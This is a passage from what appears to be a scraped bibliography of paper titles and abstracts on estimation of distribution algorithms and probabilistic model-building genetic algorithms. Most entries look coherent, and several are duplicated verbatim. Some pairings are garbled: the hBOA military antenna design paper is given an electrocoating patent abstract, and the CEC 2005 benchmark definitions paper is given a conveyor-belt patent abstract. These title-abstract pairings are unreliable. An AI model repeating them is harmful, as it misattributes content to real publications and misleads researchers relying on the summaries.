of more compact and human-readable classifiers. The dimensionality reduction procedure we propose consists of the reduction of the 20-letter amino acid (AA) alphabet, which is normally used to specify a protein sequence, into a lower cardinality alphabet. This reduction comes about by a clustering of AA types according to their physical and chemical similarity. Our automated reduction procedure is guided by a fitness function based on the Mutual Information between the AA-based input attributes of the dataset and the protein structure feature that is being predicted. To search for the optimal reduction, the Extended Compact Genetic Algorithm (ECGA) was used, and afterwards the results of this process were fed into (and validated by) BioHEL, a genetics-based machine learning technique. BioHEL used the reduced alphabet to induce rules for protein structure prediction features. BioHEL results are compared to two standard machine learning systems. Our results show that it is possible to reduce the size of the alphabet used for prediction from twenty to just three letters resulting in more compact, i.e. interpretable, rules. Also, a protein-wise accuracy performance measure suggests that the loss of accuracy accrued by this substantial alphabet reduction is not statistically significant when compared to the full alphabet. --- paper_title: Estimation of Distribution Algorithms: A New Tool for Evolutionary Computation paper_content: List of Figures. List of Tables. Preface. Contributing Authors. Series Foreword. Part I: Foundations. 1.
An Introduction to Evolutionary Algorithms J.A. Lozano. 2. An Introduction to Probabilistic Graphical Models P. Larranaga. 3. A Review on Estimation of Distribution Algorithms P. Larranaga. 4. Benefits of Data Clustering in Multimodal Function Optimization via EDAs J.M. Pena, et al. 5. Parallel Estimation of Distribution Algorithms J.A. Lozano, et al. 6. Mathematical Modeling of Discrete Estimation of Distribution Algorithms C. Gonzalez, et al. Part II: Optimization. 7. An Empiricial Comparison of Discrete Estimation of Distribution Algorithms R. Blanco., J.A. Lozano. 8. Results in Function Optimization with EDAs in Continuous Domain E. Bengoetxea, et al. 9. Solving the 0-1 Knapsack Problem with EDAs R. Sagarna, P. Larranaga. 10. Solving the Traveling Salesman Problem with EDAs V. Robles, et al. 11. EDAs Applied to the Job Shop Scheduling Problem J.A. Lozano, A. Mendiburu. 12. Solving Graph Matching with EDAs Using a Permutation-Based Representation E. Bengoetxea, et al. Part III: Machine Learning. 13. Feature Subset Selection by Estimation of Distribution Algorithms I. Inza, et al. 14. Feature Weighting for Nearest Neighbor by EDAs I. Inza, et al. 15. Rule Induction by Estimation of Distribution Algorithms B. Sierra, et al. 16. Partial Abductive Inference in Bayesian Networks: An Empirical Comparison Between GAs and EDAs L.M. de Campos, et al.17. Comparing K-Means, GAs and EDAs in Partitional Clustering J. Roure, et al. 18. Adjusting Weights in Artificial Neural Networks using Evolutionary Algorithms C. Cotta, et al. Index. --- paper_title: Military Antenna Design Using a Simple Genetic Algorithm and hBOA paper_content: A bath composition for cataphoretic electrocoating of conductive surfaces contains coating agents which have been rendered soluble or dispersible with acid, contain basic nitrogen groups and carry groups of the general formulae (1) and (11) (I) (II) and, optionally, also groups of the general formulae (III) and/or (IV) (III) (IV) where R1 and R2 are each alkyl, hydroxyalkyl or alkoxyalkyl, R3 and R4 are each hydrogen or methyl, R5 and R6 are each hydrogen, alkyl or a divalent radical of a polymer molecule which is bonded to a phenol or phenol ether, n1 is 1, 2 or 3 and n2 is 1 or 2, and where the oxygen bonded to the phenyl radical is either in the form of the OH group or etherified. --- paper_title: Population Based Incremental Learning: A Method for Integrating Genetic Search Based Function Optimization and Competitve Learning paper_content: Genetic algorithms (GAs) are biologically motivated adaptive systems which have been used, with varying degrees of success, for function optimization. In this study, an abstraction of the basic genetic algorithm, the Equilibrium Genetic Algorithm (EGA), and the GA in turn, are reconsidered within the framework of competitive learning. This new perspective reveals a number of different possibilities for performance improvements. This paper explores population-based incremental learning (PBIL), a method of combining the mechanisms of a generational genetic algorithm with simple competitive learning. The combination of these two methods reveals a tool which is far simpler than a GA, and which out-performs a GA on large set of optimization problems in terms of both speed and accuracy. This paper presents an empirical analysis of where the proposed technique will outperform genetic algorithms, and describes a class of problems in which a genetic algorithm may be able to perform better. 
Extensions to this algorithm are discussed and analyzed. PBIL and extensions are compared with a standard GA on twelve problems, including standard numerical optimization functions, traditional GA test suite problems, and NP-Complete problems. --- paper_title: A survey of optimization by building and using probabilistic models paper_content: Summarizes the research on population-based probabilistic search algorithms based on modeling promising solutions by estimating their probability distribution and using the constructed model to guide the exploration of the search space. It settles the algorithms in the field of genetic and evolutionary computation where they have been originated. All methods are classified into a few classes according to the complexity of the class of models they use. Algorithms from each of these classes are briefly described and their strengths and weaknesses are discussed. --- paper_title: Estimation of Distribution Algorithms: A New Tool for Evolutionary Computation paper_content: List of Figures. List of Tables. Preface. Contributing Authors. Series Foreword. Part I: Foundations. 1. An Introduction to Evolutionary Algorithms J.A. Lozano. 2. An Introduction to Probabilistic Graphical Models P. Larranaga. 3. A Review on Estimation of Distribution Algorithms P. Larranaga. 4. Benefits of Data Clustering in Multimodal Function Optimization via EDAs J.M. Pena, et al. 5. Parallel Estimation of Distribution Algorithms J.A. Lozano, et al. 6. Mathematical Modeling of Discrete Estimation of Distribution Algorithms C. Gonzalez, et al. Part II: Optimization. 7. An Empiricial Comparison of Discrete Estimation of Distribution Algorithms R. Blanco., J.A. Lozano. 8. Results in Function Optimization with EDAs in Continuous Domain E. Bengoetxea, et al. 9. Solving the 0-1 Knapsack Problem with EDAs R. Sagarna, P. Larranaga. 10. Solving the Traveling Salesman Problem with EDAs V. Robles, et al. 11. EDAs Applied to the Job Shop Scheduling Problem J.A. Lozano, A. Mendiburu. 12. Solving Graph Matching with EDAs Using a Permutation-Based Representation E. Bengoetxea, et al. Part III: Machine Learning. 13. Feature Subset Selection by Estimation of Distribution Algorithms I. Inza, et al. 14. Feature Weighting for Nearest Neighbor by EDAs I. Inza, et al. 15. Rule Induction by Estimation of Distribution Algorithms B. Sierra, et al. 16. Partial Abductive Inference in Bayesian Networks: An Empirical Comparison Between GAs and EDAs L.M. de Campos, et al.17. Comparing K-Means, GAs and EDAs in Partitional Clustering J. Roure, et al. 18. Adjusting Weights in Artificial Neural Networks using Evolutionary Algorithms C. Cotta, et al. Index. --- paper_title: Analyzing Deception in Trap Functions paper_content: Abstract A flat-population schema analysis is performed to find conditions for full deception in trap functions. It is found that the necessary and sufficient condition for an l-bit fully deceptive trap function is that all order l — 1 schemata are misleading, and it is observed that the trap functions commonly used in a number of test suites are not fully deceptive. Further analysis suggests that in a fully deceptive trap function, the locally optimal function value may be as low as 50% of the globally optimal function value. In this context, the limiting ratio of the locally and the globally optimal function value for a number of fully deceptive functions currently in use are calculated. The analysis indicates that trap functions allow more flexibility in designing a deceptive function. 
It is also found that the proportion of fully deceptive functions in the family of trap functions is only O(l^-1 ln l) and that more than half of the trap functions are fully easy functions. --- paper_title: FDA - A Scalable Evolutionary Algorithm for the Optimization of Additively Decomposed Functions paper_content: The Factorized Distribution Algorithm (FDA) is an evolutionary algorithm which combines mutation and recombination by using a distribution. The distribution is estimated from a set of selected points. In general, a discrete distribution defined for n binary variables has 2^n parameters. Therefore it is too expensive to compute. For additively decomposed discrete functions (ADFs) there exist algorithms which factor the distribution into conditional and marginal distributions. This factorization is used by FDA. The scaling of FDA is investigated theoretically and numerically. The scaling depends on the ADF structure and the specific assignment of function values. Difficult functions on a chain or a tree structure are solved in about O(n√n) operations. More standard genetic algorithms are not able to optimize these functions. FDA is not restricted to exact factorizations. It also works for approximate factorizations as is shown for a circle and a grid structure. By using results from Bayes networks, FDA is extended to LFDA. LFDA computes an approximate factorization using only the data, not the ADF structure. The scaling of LFDA is compared to the scaling of FDA. --- paper_title: The gambler's ruin problem, genetic algorithms, and the sizing of populations paper_content: The paper presents a model for predicting the convergence quality of genetic algorithms. The model incorporates previous knowledge about decision making in genetic algorithms and the initial supply of building blocks in a novel way. The result is an equation that accurately predicts the quality of the solution found by a GA using a given population size. Adjustments for different selection intensities are considered and computational experiments demonstrate the effectiveness of the model. --- paper_title: From Recombination of Genes to the Estimation of Distributions I. Binary Parameters paper_content: The Breeder Genetic Algorithm (BGA) is based on the equation for the response to selection. In order to use this equation for prediction, the variance of the fitness of the population has to be estimated. For the usual sexual recombination the computation can be difficult. In this paper we briefly state the problem and investigate several modifications of sexual recombination. The first method is gene pool recombination, which leads to marginal distribution algorithms. In the last part of the paper we discuss more sophisticated methods, based on estimating the distribution of promising points. --- paper_title: Population Based Incremental Learning: A Method for Integrating Genetic Search Based Function Optimization and Competitive Learning paper_content: Genetic algorithms (GAs) are biologically motivated adaptive systems which have been used, with varying degrees of success, for function optimization. In this study, an abstraction of the basic genetic algorithm, the Equilibrium Genetic Algorithm (EGA), and the GA in turn, are reconsidered within the framework of competitive learning. This new perspective reveals a number of different possibilities for performance improvements.
This paper explores population-based incremental learning (PBIL), a method of combining the mechanisms of a generational genetic algorithm with simple competitive learning. The combination of these two methods reveals a tool which is far simpler than a GA, and which out-performs a GA on large set of optimization problems in terms of both speed and accuracy. This paper presents an empirical analysis of where the proposed technique will outperform genetic algorithms, and describes a class of problems in which a genetic algorithm may be able to perform better. Extensions to this algorithm are discussed and analyzed. PBIL and extensions are compared with a standard GA on twelve problems, including standard numerical optimization functions, traditional GA test suite problems, and NP-Complete problems. --- paper_title: The compact genetic algorithm paper_content: This paper introduces the "compact genetic algorithm" (cGA). The cGA represents the population as a probability distribution over the set of solutions, and is operationally equivalent to the order-one behavior of the simple GA with uniform crossover. It processes each gene independently and requires less memory than the simple GA. --- paper_title: MIMIC: Finding Optima by Estimating Probability Densities paper_content: In many optimization problems, the structure of solutions reflects complex relationships between the different input parameters. For example, experience may tell us that certain parameters are closely related and should not be explored independently. Similarly, experience may establish that a subset of parameters must take on particular values. Any search of the cost landscape should take advantage of these relationships. We present MIMIC, a framework in which we analyze the global structure of the optimization landscape. A novel and efficient algorithm for the estimation of this structure is derived. We use knowledge of this structure to guide a randomized search through the solution space and, in turn, to refine our estimate ofthe structure. Our technique obtains significant speed gains over other randomized optimization procedures. --- paper_title: Using Optimal Dependency-Trees for Combinatorial Optimization: Learning the Structure of the Search Space paper_content: Many combinatorial optimization algorithms have no mechanism for capturing inter-parameter dependencies. However, modeling such dependencies may allow an algorithm to concentrate its sampling more effectively on regions of the search space which have appeared promising in the past. We present an algorithm which incrementally learns pairwise probability distributions from good solutions seen so far, uses these statistics to generate optimal (in terms of maximum likelihood) dependency trees to model these distributions, and then stochastically generates new candidate solutions from these trees. We test this algorithm on a variety of optimization problems. Our results indicate superior performance over other tested algorithms that either (1) do not explicitly use these dependencies, or (2) use these dependencies to generate a more restricted class of dependency graphs. --- paper_title: Approximating discrete probability distributions with dependence trees paper_content: A method is presented to approximate optimally an n -dimensional discrete probability distribution by a product of second-order distributions, or the distribution of the first-order tree dependence. 
The problem is to find an optimum set of n - 1 first order dependence relationship among the n variables. It is shown that the procedure derived in this paper yields an approximation of a minimum difference in information. It is further shown that when this procedure is applied to empirical observations from an unknown distribution of tree dependence, the procedure is the maximum-likelihood estimate of the distribution. --- paper_title: The Bivariate Marginal Distribution Algorithm paper_content: The paper deals with the Bivariate Marginal Distribution Algorithm (BMDA). BMDA is an extension of the Univariate Marginal Distribution Algorithm (UMDA). It uses the pair gene dependencies in order to improve algorithms that use simple univariate marginal distributions. BMDA is a special case of the Factorization Distribution Algorithm, but without any problem specific knowledge in the initial stage. The dependencies are being discovered during the optimization process itself. In this paper BMDA is described in detail. BMDA is compared to different algorithms including the simple genetic algorithm with different crossover methods and UMDA. For some fitness functions the relation between problem size and the number of fitness evaluations until convergence is shown. --- paper_title: A Bayesian Approach to Learning Bayesian Networks with Local Structure paper_content: Recently several researchers have investigated techniques for using data to learn Bayesian networks containing compact representations for the conditional probability distributions (CPDs) stored at each node. The majority of this work has concentrated on using decision-tree representations for the CPDs. In addition, researchers typically apply non-Bayesian (or asymptotically Bayesian) scoring functions such as MDL to evaluate the goodness-of-fit of networks to the data. ::: ::: In this paper we investigate a Bayesian approach to learning Bayesian networks that contain the more general decision-graph representations of the CPDs. First, we describe how to evaluate the posterior probability-- that is, the Bayesian score--of such a network, given a database of observed cases. Second, we describe various search spaces that can be used, in conjunction with a scoring function and a search procedure, to identify one or more high-scoring networks. Finally, we present an experimentd evaluation of the search spaces, using a greedy algorithm and a Bayesian scoring function. --- paper_title: Hierarchical Bayesian optimization algorithm: toward a new generation of evolutionary algorithms paper_content: Over the last few decades, genetic and evolutionary algorithms (GEAs) have been successfully applied to many problems of business, engineering, and science. This paper discusses probabilistic model-building genetic algorithms (PMBGAs), which are among the most important directions of current GEA research. PMBGAs replace traditional variation operators of GEAs by learning and sampling a probabilistic model of promising solutions. The paper describes two advanced PMBGAs: the Bayesian optimization algorithm (BOA), and the hierarchical BOA (hBOA). The paper argues that BOA and hBOA can solve an important class of nearly decomposable and hierarchical problems in a quadratic or subquadratic number of function evaluations with respect to the number of decision variables. 
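The dependence-tree references above ("Approximating discrete probability distributions with dependence trees" and "Using Optimal Dependency-Trees for Combinatorial Optimization") build a tree over pairwise mutual information. A minimal sketch of that construction is shown below; the toy data set, the use of Prim's algorithm, and all function names are illustrative assumptions rather than the exact procedures of those papers.

import math
from itertools import combinations

def mutual_information(samples, i, j):
    """Empirical mutual information (in nats) between binary variables i and j."""
    n = len(samples)
    mi = 0.0
    for a in (0, 1):
        for b in (0, 1):
            p_ab = sum(1 for s in samples if s[i] == a and s[j] == b) / n
            p_a = sum(1 for s in samples if s[i] == a) / n
            p_b = sum(1 for s in samples if s[j] == b) / n
            if p_ab > 0:
                mi += p_ab * math.log(p_ab / (p_a * p_b))
    return mi

def chow_liu_tree(samples):
    """Return (parent, child) edges of a maximum spanning tree over pairwise
    mutual information, grown greedily from variable 0 (Prim's algorithm)."""
    n_vars = len(samples[0])
    mi = {(i, j): mutual_information(samples, i, j) for i, j in combinations(range(n_vars), 2)}
    in_tree, edges = {0}, []
    while len(in_tree) < n_vars:
        best = max(((i, j) for i in in_tree for j in range(n_vars) if j not in in_tree),
                   key=lambda e: mi[tuple(sorted(e))])
        edges.append(best)
        in_tree.add(best[1])
    return edges

# Toy data: variable 1 copies variable 0, while variable 2 is only weakly related.
data = [(0, 0, 1), (1, 1, 0), (1, 1, 1), (0, 0, 0), (1, 1, 0), (0, 0, 1)]
print(chow_liu_tree(data))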
--- paper_title: FDA - A Scalable Evolutionary Algorithm for the Optimization of Additively Decomposed Functions paper_content: The Factorized Distribution Algorithm (FDA) is an evolutionary algorithm which combines mutation and recombination by using a distribution. The distribution is estimated from a set of selected points. In general, a discrete distribution defined for n binary variables has 2^n parameters. Therefore it is too expensive to compute. For additively decomposed discrete functions (ADFs) there exist algorithms which factor the distribution into conditional and marginal distributions. This factorization is used by FDA. The scaling of FDA is investigated theoretically and numerically. The scaling depends on the ADF structure and the specific assignment of function values. Difficult functions on a chain or a tree structure are solved in about O(n√n) operations. More standard genetic algorithms are not able to optimize these functions. FDA is not restricted to exact factorizations. It also works for approximate factorizations as is shown for a circle and a grid structure. By using results from Bayes networks, FDA is extended to LFDA. LFDA computes an approximate factorization using only the data, not the ADF structure. The scaling of LFDA is compared to the scaling of FDA. --- paper_title: Learning Bayesian Networks with Local Structure paper_content: We examine a novel addition to the known methods for learning Bayesian networks from data that improves the quality of the learned networks. Our approach explicitly represents and learns the local structure in the conditional probability distributions (CPDs) that quantify these networks. This increases the space of possible models, enabling the representation of CPDs with a variable number of parameters. The resulting learning procedure induces models that better emulate the interactions present in the data. We describe the theoretical foundations and practical aspects of learning local structures and provide an empirical evaluation of the proposed learning procedure. This evaluation indicates that learning curves characterizing this procedure converge faster, in the number of training instances, than those of the standard procedure, which ignores the local structure of the CPDs. Our results also show that networks learned with local structures tend to be more complex (in terms of arcs), yet require fewer parameters. --- paper_title: Propagating Uncertainty in Bayesian Networks by Probabilistic Logic Sampling paper_content: Bayesian belief networks and influence diagrams are attractive approaches for representing uncertain expert knowledge in coherent probabilistic form. But current algorithms for propagating updates are either restricted to singly connected networks (Chow trees), as the scheme of Pearl and Kim, or they are liable to exponential complexity when dealing with multiply connected networks. Probabilistic logic sampling is a new scheme employing stochastic simulation which can make probabilistic inferences in large, multiply connected networks, with an arbitrary degree of precision controlled by the sample size. A prototype implementation, named Pulse, is illustrated, which provides efficient methods to estimate conditional probabilities, perform systematic sensitivity analysis, and compute evidence weights to explain inferences.
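Forward sampling of the kind described in the probabilistic logic sampling reference above is also the mechanism Bayesian-network EDAs such as FDA and BOA use to draw new candidate solutions from a learned model. The sketch below samples a tiny hand-specified three-node network; the structure, node names, and probability values are invented purely for illustration.

import random

def forward_sample(nodes, parents, cpt, rng):
    """nodes: variables in topological order; parents[x]: tuple of parent names;
    cpt[x][parent_values]: P(x = 1 | parents). Returns one joint sample."""
    sample = {}
    for x in nodes:
        pa_vals = tuple(sample[p] for p in parents[x])
        sample[x] = 1 if rng.random() < cpt[x][pa_vals] else 0
    return sample

# Hypothetical three-node network A -> B, (A, B) -> C with made-up probabilities.
nodes = ["A", "B", "C"]
parents = {"A": (), "B": ("A",), "C": ("A", "B")}
cpt = {
    "A": {(): 0.6},
    "B": {(0,): 0.2, (1,): 0.7},
    "C": {(0, 0): 0.1, (0, 1): 0.5, (1, 0): 0.4, (1, 1): 0.9},
}
rng = random.Random(1)
print([forward_sample(nodes, parents, cpt, rng) for _ in range(3)])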
--- paper_title: Learning Factorizations in Estimation of Distribution Algorithms Using Affinity Propagation paper_content: Estimation of distribution algorithms (EDAs) that use marginal product model factorizations have been widely applied to a broad range of mainly binary optimization problems. In this paper, we introduce the affinity propagation EDA (AffEDA), which learns a marginal product model by clustering a matrix of mutual information learned from the data using a very efficient message-passing algorithm known as affinity propagation. The introduced algorithm is tested on a set of binary and nonbinary decomposable functions and using a hard combinatorial class of problems known as the HP protein model. The results show that the algorithm is a very efficient alternative to other EDAs that use marginal product model factorizations such as the extended compact genetic algorithm (ECGA) and improves the quality of the results achieved by ECGA when the cardinality of the variables is increased. --- paper_title: An EDA based on local markov property and gibbs sampling paper_content: The key ideas behind most of the recently proposed Markov network based EDAs were to factorise the joint probability distribution in terms of the cliques in the undirected graph. As such, they made use of the global Markov property of the Markov network. Here we present a Markov Network based EDA that exploits Gibbs sampling to sample from the local Markov property, the Markovianity, and does not directly model the joint distribution. We call it the Markovianity based Optimisation Algorithm. Some initial results on the performance of the proposed algorithm show that it compares well with other Bayesian network based EDAs. --- paper_title: The Bivariate Marginal Distribution Algorithm paper_content: The paper deals with the Bivariate Marginal Distribution Algorithm (BMDA). BMDA is an extension of the Univariate Marginal Distribution Algorithm (UMDA). It uses the pair gene dependencies in order to improve algorithms that use simple univariate marginal distributions. BMDA is a special case of the Factorization Distribution Algorithm, but without any problem specific knowledge in the initial stage. The dependencies are being discovered during the optimization process itself. In this paper BMDA is described in detail. BMDA is compared to different algorithms including the simple genetic algorithm with different crossover methods and UMDA. For some fitness functions the relation between problem size and the number of fitness evaluations until convergence is shown. --- paper_title: Linkage Problem, Distribution Estimation, and Bayesian Networks paper_content: This paper proposes an algorithm that uses an estimation of the joint distribution of promising solutions in order to generate new candidate solutions. The algorithm is settled into the context of genetic and evolutionary computation and the algorithms based on the estimation of distributions. The proposed algorithm is called the Bayesian Optimization Algorithm (BOA). To estimate the distribution of promising solutions, the techniques for modeling multivariate data by Bayesian networks are used. The BOA identifies, reproduces, and mixes building blocks up to a specified order. It is independent of the ordering of the variables in strings representing the solutions. Moreover, prior information about the problem can be incorporated into the algorithm, but it is not essential.
First experiments were done with additively decomposable problems with both nonoverlapping as well as overlapping building blocks. The proposed algorithm is able to solve all but one of the tested problems in linear or close to linear time with respect to the problem size. Except for the maximal order of interactions to be covered, the algorithm does not use any prior knowledge about the problem. The BOA represents a step toward alleviating the problem of identifying and mixing building blocks correctly to obtain good solutions for problems with very limited domain information. --- paper_title: Learning Bayesian Networks: The Combination of Knowledge and Statistical Data paper_content: We describe a Bayesian approach for learning Bayesian networks from a combination of prior knowledge and statistical data. First and foremost, we develop a methodology for assessing informative priors needed for learning. Our approach is derived from a set of assumptions made previously as well as the assumption of likelihood equivalence, which says that data should not help to discriminate network structures that represent the same assertions of conditional independence. We show that likelihood equivalence when combined with previously made assumptions implies that the user's priors for network parameters can be encoded in a single Bayesian network for the next case to be seen—a prior network—and a single measure of confidence for that network. Second, using these priors, we show how to compute the relative posterior probabilities of network structures given data. Third, we describe search methods for identifying network structures with high posterior probabilities. We describe polynomial algorithms for finding the highest-scoring network structures in the special case where every node has at most k=1 parent. For the general case (k>1), which is NP-hard, we review heuristic search algorithms including local search, iterative local search, and simulated annealing. Finally, we describe a methodology for evaluating Bayesian-network learning algorithms, and apply this approach to a comparison of various approaches. --- paper_title: Learning Bayesian networks: the combination of knowledge and statistical data paper_content: We describe scoring metrics for learning Bayesian networks from a combination of user knowledge and statistical data. We identify two important properties of metrics, which we call event equivalence and parameter modularity. These properties have been mostly ignored, but when combined, greatly simplify the encoding of a user's prior knowledge. In particular, a user can express his knowledge--for the most part--as a single prior Bayesian network for the domain. --- paper_title: Dependency trees, permutations, and quadratic assignment problem paper_content: This paper describes and analyzes an estimation of distribution algorithm based on dependency tree models (dtEDA), which can explicitly encode probabilistic models for permutations. dtEDA is tested on deceptive ordering problems and a number of instances of the quadratic assignment problem. The performance of dtEDA is compared to that of the standard genetic algorithm with the partially matched crossover (PMX) and the linear order crossover (LOX). In the quadratic assignment problem, the robust tabu search is also included in the comparison.
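BOA and the Bayesian-network learning references above score candidate network structures against the population of selected solutions. The snippet below uses a BIC-style score as a stand-in for the Bayesian metrics discussed there; it is only meant to show how a candidate parent set for one binary variable can be compared against the empty parent set, and the example population, names, and penalty form are assumptions made for illustration.

import math
from collections import Counter

def bic_score(samples, child, parents):
    """BIC/MDL-style score of a candidate parent set for one binary variable,
    computed from a population of selected solutions (higher is better)."""
    n = len(samples)
    counts = Counter((tuple(s[p] for p in parents), s[child]) for s in samples)
    parent_counts = Counter(tuple(s[p] for p in parents) for s in samples)
    # Maximum-likelihood log-likelihood of the child given each parent configuration.
    loglik = sum(c * math.log(c / parent_counts[pa]) for (pa, _), c in counts.items())
    free_params = 2 ** len(parents)  # one Bernoulli parameter per parent configuration
    return loglik - 0.5 * free_params * math.log(n)

# Hypothetical selected population over 3 binary variables; variable 1 tracks variable 0,
# so the parent set [0] should score higher for child 1 than the empty parent set.
pop = [(0, 0, 1), (1, 1, 0), (1, 1, 1), (0, 0, 0), (1, 1, 1), (0, 0, 1)]
print(bic_score(pop, child=1, parents=[0]), bic_score(pop, child=1, parents=[]))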
--- paper_title: Solving the Traveling Salesman Problem with EDAs paper_content: In this chapter we present an approach for solving the Traveling Salesman Problem using Estimation of Distribution Algorithms (EDAs). This approach is based on using discrete and continuous EDAs to find the best possible solution. We also present a method in which domain knowledge (based on local search) is combined with EDAs to find better solutions. We show experimental results obtained on several standard examples for discrete and continuous EDAs both alone and combined with a heuristic local search. --- paper_title: Probabilistic Model-Building Genetic Algorithms in Permutation Representation Domain Using Edge Histogram paper_content: Recently, there has been a growing interest in developing evolutionary algorithms based on probabilistic modeling. In this scheme, the offspring population is generated according to the estimated probability density model of the parent instead of using recombination and mutation operators. In this paper, we have proposed probabilistic model-building genetic algorithms (PMBGAs) in permutation representation domain using edge histogram based sampling algorithms (EHBSAs). Two types of sampling algorithms, without template (EHBSA/WO) and with template (EHBSA/WT), are presented. The results were tested in the TSP and showed EHBSA/WT worked fairly well with a small population size in the test problems used. It also worked better than well-known traditional two-parent recombination operators. --- paper_title: Genetic Algorithms and Random Keys for Sequencing and Optimization paper_content: In this paper we present a general genetic algorithm to address a wide variety of sequencing and optimization problems including multiple machine scheduling, resource allocation, and the quadratic assignment problem. When addressing such problems, genetic algorithms typically have difficulty maintaining feasibility from parent to offspring. This is overcome with a robust representation technique called random keys. Computational results are shown for multiple machine scheduling, resource allocation, and quadratic assignment problems. INFORMS Journal on Computing, ISSN 1091-9856, was published as ORSA Journal on Computing from 1989 to 1995 under ISSN 0899-1499. --- paper_title: Getting the best of both worlds: discrete and continuous genetic and evolutionary algorithms in concert paper_content: This paper describes an evolutionary algorithm for optimization of continuous problems that combines advanced recombination techniques for discrete representations with advanced mutation techniques for continuous representations. Discretization is used to transform solutions between the discrete and continuous domains. The proposed algorithm combines the strengths of purely continuous and purely discrete approaches and eliminates some of their disadvantages. The paper tests the proposed algorithm with the recombination operator of the Bayesian optimization algorithm, σ-self-adaptive mutation, and three discretization methods. The empirical results on three problems suggest that the tested variant of the algorithm scales up well on all tested problems, indicating good scalability over a broad range of continuous problems.
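The random-keys encoding referenced above can be stated very compactly. The following minimal sketch, written only for illustration and not taken from the cited chapter, decodes a vector of real-valued keys into a permutation by sorting, so that any real-valued EDA or GA can operate on the keys while the decoded permutation remains feasible.

    import numpy as np

    def decode_random_keys(keys):
        """Interpret a real-valued vector as a permutation: the position with the
        smallest key comes first, the next smallest second, and so on."""
        return np.argsort(keys)

    # Example: five jobs encoded by keys drawn uniformly from [0, 1).
    rng = np.random.default_rng(0)
    keys = rng.random(5)
    print(decode_random_keys(keys))   # a permutation of 0..4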
--- paper_title: Problem Definitions and Evaluation Criteria for the CEC 2005 Special Session on Real-Parameter Optimization paper_content: An elevating conveyor having a first endless belt entrained around a plurality of spaced support or guide drums for elevating material through an elevating section to a discharge station and a second endless loading belt also entrained around guide drums to cooperate with the first belt at least where a loading station and the elevating section merge so that in this vicinity the belts are in overlying relationship with each other so that material on the upper surface of one belt is held on the surface by the other belt. The two belts are moved at similar speeds in the same direction and a fixed plate cooperates with the first belt in the elevating section so that material located between the belt and plate is elevated to the discharge station by upward movement of the first belt through the elevating section. The conveyor may be of C, L or Z shape and the first belt preferably has upstanding side walls, the top faces of which bear against low friction material supported on the plate. --- paper_title: Adaptive discretization for probabilistic model building genetic algorithms paper_content: This paper proposes an adaptive discretization method, called Split-on-Demand (SoD), to enable the probabilistic model building genetic algorithm (PMBGA) to solve optimization problems in the continuous domain. The procedure, effect, and usage of SoD are described in detail. As an example, the integration of SoD and the extended compact genetic algorithm (ECGA), named real-coded ECGA (rECGA), is presented and numerically examined. The experimental results indicate that rECGA works well and SoD is effective. The behavior of SoD is analyzed and discussed, followed by the potential future work for SoD. --- paper_title: Enabling the Extended Compact Genetic Algorithm for Real-Parameter Optimization by Using Adaptive Discretization paper_content: An adaptive discretization method, called split-on-demand (SoD), enables estimation of distribution algorithms (EDAs) for discrete variables to solve continuous optimization problems. SoD randomly splits a continuous interval if the number of search points within the interval exceeds a threshold, which is decreased at every iteration. After the split operation, the nonempty intervals are assigned integer codes, and the search points are discretized accordingly. As an example of using SoD with EDAs, the integration of SoD and the extended compact genetic algorithm (ECGA) is presented and numerically examined. In this integration, we adopt a local search mechanism as an optional component of our back end optimization engine. As a result, the proposed framework can be considered as a memetic algorithm, and SoD can potentially be applied to other memetic algorithms. The numerical experiments consist of two parts: (1) a set of benchmark functions on which ECGA with SoD and ECGA with two well-known discretization methods: the fixed-height histogram (FHH) and the fixed-width histogram (FWH) are compared; (2) a real-world application, the economic dispatch problem, on which ECGA with SoD is compared to other methods. The experimental results indicate that SoD is a better discretization method to work with ECGA. Moreover, ECGA with SoD works quite well on the economic dispatch problem and delivers solutions better than the best known results obtained by other methods in existence. 
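To make the histogram-based discretization schemes above concrete, the sketch below builds a fixed-width marginal histogram for one continuous variable from the selected individuals and samples new values by first drawing a bin according to its frequency and then drawing uniformly within that bin. This is a generic illustration of the fixed-width histogram idea under our own naming, not an excerpt from the cited work.

    import numpy as np

    def sample_fixed_width_histogram(selected_values, n_bins, n_samples, rng):
        """One-dimensional fixed-width histogram model: estimate bin frequencies
        from the selected individuals, then sample bins proportionally and draw
        uniformly inside each sampled bin."""
        lo, hi = selected_values.min(), selected_values.max()
        counts, edges = np.histogram(selected_values, bins=n_bins, range=(lo, hi))
        probs = (counts + 1e-12) / (counts.sum() + n_bins * 1e-12)  # smoothed frequencies
        bins = rng.choice(n_bins, size=n_samples, p=probs)
        return rng.uniform(edges[bins], edges[bins + 1])

    rng = np.random.default_rng(1)
    parents = rng.normal(loc=2.0, scale=0.5, size=200)
    offspring = sample_fixed_width_histogram(parents, n_bins=20, n_samples=100, rng=rng)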
--- paper_title: Evolutionary Algorithm Using Marginal Histogram Models Continuous Domain paper_content: Recently, there has been a growing interest in developing evolutionary algorithms based on probabilistic modeling. In this scheme, the offspring population is generated according to the estimated probability density model of the parents instead of using recombination and mutation operators. In this paper, we propose an evolutionary algorithm using a marginal histogram to model the parent population in a continuous domain. We propose two types of marginal histogram models: the fixed-width histogram (FWH) and the fixed-height histogram (FHH). The results showed that both models worked fairly well on test functions with no or weak interactions among variables. Especially, FHH could find the global optimum with very high accuracy effectively and showed good scale-up with the problem size. --- paper_title: Real-valued Evolutionary Optimization using a Flexible Probability Density Estimator paper_content: Population-Based Incremental Learning (PBIL) is an abstraction of a genetic algorithm, which solves optimization problems by explicitly constructing a probabilistic model of the promising regions of the search space. At each iteration the model is used to generate a population of candidate solutions and is itself modified in response to these solutions. Through the extension of PBIL to Real-valued search spaces, a more powerful and general algorithmic framework arises which enables the use of arbitrary probability density estimation techniques in evolutionary optimization. To illustrate the usefulness of the framework, we propose and implement an evolutionary algorithm which uses a finite Adaptive Gaussian mixture model density estimator. This method offers considerable power and flexibility in the forms of the density which can be effectively modeled. We discuss the general applicability of the framework, and suggest that future work should lead to the development of better evolutionary optimization algorithms. --- paper_title: Real-Coded Bayesian Optimization Algorithm: Bringing the Strength of BOA into the Continuous World paper_content: This paper describes a continuous estimation of distribution algorithm (EDA) to solve decomposable, real-valued optimization problems quickly, accurately, and reliably. This is the real-coded Bayesian optimization algorithm (rBOA). The objective is to bring the strength of (discrete) BOA to bear upon the area of real-valued optimization. That is, the rBOA must properly decompose a problem, efficiently fit each subproblem, and effectively exploit the results so that correct linkage learning even on nonlinearity and probabilistic building-block crossover (PBBC) are performed for real-valued multivariate variables. The idea is to perform a Bayesian factorization of a mixture of probability distributions, find maximal connected subgraphs (i.e. substructures) of the Bayesian factorization graph (i.e., the structure of a probabilistic model), independently fit each substructure by a mixture distribution estimated from clustering results in the corresponding partial-string space 